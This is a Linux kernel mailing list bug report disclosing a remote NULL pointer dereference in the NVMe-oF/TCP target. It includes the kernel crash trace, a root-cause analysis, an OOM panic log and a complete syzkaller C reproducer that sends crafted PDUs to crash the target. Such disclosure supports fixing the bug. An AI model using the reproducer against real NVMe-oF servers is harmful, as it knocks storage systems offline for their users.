[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`

* [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
@ 2023-11-06 13:41 Alon Zahavi
  2023-11-06 21:35 ` Chaitanya Kulkarni
  2023-11-07 10:03 ` Chaitanya Kulkarni
  0 siblings, 2 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-06 13:41 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Chaitanya Kulkarni, Christoph Hellwig

# Bug Overview

## The Bug
A null-ptr-deref in `__nvmet_req_complete`.

## Bug Location
`drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.

## Bug Class
Remote Denial of Service

## Disclaimer:
This bug was found using Syzkaller with NVMe-oF/TCP added support.

# Technical Details

## Kernel Report - NULL Pointer Dereference

BUG: kernel NULL pointer dereference, address: 0000000000000020
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
PKRU: 55555554
Call Trace:
 <TASK>
 nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
 nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
 nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
 nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
 nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>

## Description

### Tracing The Bug
The bug occurs during the execution of __nvmet_req_complete. Looking
in the report generated by syzkaller, we can see the exact line of
code that triggers the bug.

Code Block 1:
```
static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
{
struct nvmet_ns *ns = req->ns;

if (!req->sq->sqhd_disabled) // 1
nvmet_update_sq_head(req);

  ..
}
```

In the first code block, we can see that there is a dereference of
`req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
However, when executing the reproducer, `req->sq` is NULL. When trying
to dereference it, the kernel triggers a panic.

## Root Cause
`req` is initialized during `nvmet_req_init`. However, the sequence
that leads into `__nvmet_req_complete` does not contain any call for
`nvmet_req_init`, thus crashing the kernel with NULL pointer
dereference. This flow of execution can also create a situation where
an uninitialized memory address will be dereferenced, which has
undefined behaviour.

## Reproducer
I am adding a reproducer generated by Syzkaller with some
optimizations and minor changes.

```
// autogenerated by syzkaller (<https://github.com/google/syzkaller>)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
         "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
         "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35"
         "\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86"
         "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
         "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
         "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x20000080 = 6;
  *(uint8_t*)0x20000081 = 3;
  *(uint8_t*)0x20000082 = 0x18;
  *(uint8_t*)0x20000083 = 0x1c;
  *(uint32_t*)0x20000084 = 2;
  *(uint16_t*)0x20000088 = 0x5d;
  *(uint16_t*)0x2000008a = 3;
  *(uint32_t*)0x2000008c = 0;
  *(uint32_t*)0x20000090 = 7;
  memcpy((void*)0x20000094, "\\x83\\x9e\\x4f\\x1a", 4);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```

### More information
When trying to reproduce the bug, this bug sometimes changes from a
null-ptr-deref into OOM (out of memory) panic.
This implies that there might be another memory corruption that also
happens before the dereferencing of NULL. I couldn't find the root
cause for the OOM bug. However, I am attaching the kernel log for that
bug below.
```
kworker/u2:1 invoked oom-killer:
gfp_mask=0xcd0(GFP_KERNEL|__GFP_RECLAIMABLE), order=0, oom_score_adj=0
CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: eval_map_wq tracer_init_tracefs_work_func
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:88
 dump_stack_lvl+0xe1/0x110 lib/dump_stack.c:106
 dump_stack+0x19/0x20 lib/dump_stack.c:113
 dump_header+0x5c/0x7c0 mm/oom_kill.c:460
 out_of_memory+0x764/0xb10 mm/oom_kill.c:1161
 __alloc_pages_may_oom mm/page_alloc.c:3393
 __alloc_pages_slowpath mm/page_alloc.c:4153
 __alloc_pages+0xe87/0x1220 mm/page_alloc.c:4490
 alloc_pages+0xd7/0x200 mm/mempolicy.c:2279
 alloc_slab_page mm/slub.c:1862
 allocate_slab+0x37e/0x500 mm/slub.c:2017
 new_slab mm/slub.c:2062
 ___slab_alloc+0x9c6/0x1250 mm/slub.c:3215
 __slab_alloc mm/slub.c:3314
 __slab_alloc_node mm/slub.c:3367
 slab_alloc_node mm/slub.c:3460
 slab_alloc mm/slub.c:3478
 __kmem_cache_alloc_lru mm/slub.c:3485
 kmem_cache_alloc_lru+0x45e/0x5d0 mm/slub.c:3501
 __d_alloc+0x3d/0x2f0 fs/dcache.c:1769
 d_alloc fs/dcache.c:1849
 d_alloc_parallel+0x75/0x1040 fs/dcache.c:2638
 __lookup_slow+0xf4/0x2a0 fs/namei.c:1675
 lookup_one_len+0xde/0x100 fs/namei.c:2742
 start_creating+0xaf/0x180 fs/tracefs/inode.c:426
 tracefs_create_file+0xa2/0x260 fs/tracefs/inode.c:493
 trace_create_file+0x38/0x70 kernel/trace/trace.c:9014
 event_create_dir+0x4c0/0x6e0 kernel/trace/trace_events.c:2470
 __trace_early_add_event_dirs+0x57/0x100 kernel/trace/trace_events.c:3570
 early_event_add_tracer kernel/trace/trace_events.c:3731
 event_trace_init+0xe4/0x160 kernel/trace/trace_events.c:3888
 tracer_init_tracefs_work_func+0x15/0x440 kernel/trace/trace.c:9904
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
Mem-Info:
active_anon:0 inactive_anon:0 isolated_anon:0
 active_file:0 inactive_file:0 isolated_file:0
 unevictable:0 dirty:0 writeback:0
 slab_reclaimable:2207 slab_unreclaimable:3054
 mapped:0 shmem:0 pagetables:3
 sec_pagetables:0 bounce:0
 kernel_misc_reclaimable:0
 free:691 free_pcp:2 free_cma:0
Node 0 active_anon:0kB inactive_anon:0kB active_file:0kB
inactive_file:0kB unevictable:0kB isolated(anon):0kB
isolated(file):0kB mapped:0kB dirty:0kB writeback:0kB shmem:0kB
shmem_thp: 0kB shmem_pmdmapped: 0kB anon_thp: 0kB writeback_tmp:0kB
kernel_stack:624kB pagetables:12kB sec_pagetables:0kB
all_unreclaimable? no
Node 0 DMA free:0kB boost:0kB min:0kB low:0kB high:0kB
reserved_highatomic:0KB active_anon:0kB inactive_anon:0kB
active_file:0kB inactive_file:0kB unevictable:0kB writepending:0kB
present:600kB managed:0kB mlocked:0kB bounce:0kB free_pcp:0kB
local_pcp:0kB free_cma:0kB
lowmem_reserve[]: 0 0 0 0 0
Node 0 DMA32 free:2764kB boost:2048kB min:2764kB low:2940kB
high:3116kB reserved_highatomic:0KB active_anon:0kB inactive_anon:0kB
active_file:0kB inactive_file:0kB unevictable:0kB writepending:0kB
present:195988kB managed:32344kB mlocked:0kB bounce:0kB free_pcp:8kB
local_pcp:8kB free_cma:0kB
lowmem_reserve[]: 0 0 0 0 0
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB
0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 3*4kB (ME) 0*8kB 4*16kB (UM) 2*32kB (UM) 1*64kB (U)
2*128kB (UM) 1*256kB (M) 2*512kB (UE) 1*1024kB (U) 0*2048kB 0*4096kB =
2764kB
Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0
hugepages_size=1048576kB
Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
0 total pagecache pages
0 pages in swap cache
Free swap  = 0kB
Total swap = 0kB
49147 pages RAM
0 pages HighMem/MovableOnly
41061 pages reserved
0 pages hwpoisoned
Unreclaimable slab info:
Name                      Used          Total
bio_crypt_ctx              7KB          7KB
bio-200                    4KB          4KB
biovec-max                32KB         32KB
biovec-128                16KB         16KB
biovec-64                  8KB          8KB
dmaengine-unmap-256         30KB         30KB
dmaengine-unmap-128         15KB         15KB
skbuff_ext_cache           3KB          3KB
skbuff_small_head          7KB          7KB
skbuff_head_cache          4KB          4KB
proc_dir_entry            44KB         44KB
shmem_inode_cache         15KB         15KB
kernfs_node_cache       4559KB       4559KB
mnt_cache                  7KB          7KB
names_cache               32KB         32KB
lsm_inode_cache          139KB        139KB
nsproxy                    3KB          3KB
files_cache               15KB         15KB
signal_cache              62KB         62KB
sighand_cache             91KB         91KB
task_struct              353KB        353KB
cred_jar                   7KB          7KB
pid                       12KB         12KB
Acpi-ParseExt              3KB          3KB
Acpi-State                 3KB          3KB
shared_policy_node        390KB        390KB
numa_policy                3KB          3KB
perf_event                30KB         30KB
trace_event_file         142KB        142KB
ftrace_event_field        231KB        231KB
pool_workqueue            12KB         12KB
maple_node                 4KB          4KB
mm_struct                 30KB         30KB
vmap_area                696KB        696KB
page->ptl                  4KB          4KB
kmalloc-cg-4k             32KB         32KB
kmalloc-cg-2k             16KB         16KB
kmalloc-cg-1k              8KB          8KB
kmalloc-cg-512             8KB          8KB
kmalloc-cg-256             4KB          4KB
kmalloc-cg-192             3KB          3KB
kmalloc-cg-128             4KB          4KB
kmalloc-cg-96              3KB          3KB
kmalloc-cg-32              4KB          4KB
kmalloc-cg-16              4KB          4KB
kmalloc-cg-8               4KB          4KB
kmalloc-8k                64KB         64KB
kmalloc-4k               288KB        288KB
kmalloc-2k              2656KB       2656KB
kmalloc-1k               184KB        184KB
kmalloc-512              736KB        736KB
kmalloc-256               44KB         44KB
kmalloc-192               55KB         55KB
kmalloc-128               28KB         28KB
kmalloc-96                43KB         43KB
kmalloc-64                84KB         84KB
kmalloc-32                72KB         72KB
kmalloc-16                68KB         68KB
kmalloc-8                 20KB         20KB
kmem_cache_node           16KB         16KB
kmem_cache                32KB         32KB
Tasks state (memory values in pages):
[  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents
oom_score_adj name
Out of memory and no killable processes...
Kernel panic - not syncing: System is deadlocked on memory
CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: eval_map_wq tracer_init_tracefs_work_func
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:88
 dump_stack_lvl+0xaa/0x110 lib/dump_stack.c:106
 dump_stack+0x19/0x20 lib/dump_stack.c:113
 panic+0x567/0x5b0 kernel/panic.c:340
 out_of_memory+0xb0d/0xb10 mm/oom_kill.c:1169
 __alloc_pages_may_oom mm/page_alloc.c:3393
 __alloc_pages_slowpath mm/page_alloc.c:4153
 __alloc_pages+0xe87/0x1220 mm/page_alloc.c:4490
 alloc_pages+0xd7/0x200 mm/mempolicy.c:2279
 alloc_slab_page mm/slub.c:1862
 allocate_slab+0x37e/0x500 mm/slub.c:2017
 new_slab mm/slub.c:2062
 ___slab_alloc+0x9c6/0x1250 mm/slub.c:3215
 __slab_alloc mm/slub.c:3314
 __slab_alloc_node mm/slub.c:3367
 slab_alloc_node mm/slub.c:3460
 slab_alloc mm/slub.c:3478
 __kmem_cache_alloc_lru mm/slub.c:3485
 kmem_cache_alloc_lru+0x45e/0x5d0 mm/slub.c:3501
 __d_alloc+0x3d/0x2f0 fs/dcache.c:1769
 d_alloc fs/dcache.c:1849
 d_alloc_parallel+0x75/0x1040 fs/dcache.c:2638
 __lookup_slow+0xf4/0x2a0 fs/namei.c:1675
 lookup_one_len+0xde/0x100 fs/namei.c:2742
 start_creating+0xaf/0x180 fs/tracefs/inode.c:426
 tracefs_create_file+0xa2/0x260 fs/tracefs/inode.c:493
 trace_create_file+0x38/0x70 kernel/trace/trace.c:9014
 event_create_dir+0x4c0/0x6e0 kernel/trace/trace_events.c:2470
 __trace_early_add_event_dirs+0x57/0x100 kernel/trace/trace_events.c:3570
 early_event_add_tracer kernel/trace/trace_events.c:3731
 event_trace_init+0xe4/0x160 kernel/trace/trace_events.c:3888
 tracer_init_tracefs_work_func+0x15/0x440 kernel/trace/trace.c:9904
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
---[ end Kernel panic - not syncing: System is deadlocked on memory ]---
```
In case you found out what caused the OOM, please let me know.

^ permalink raw reply	[flat|nested] 6+ messages in thread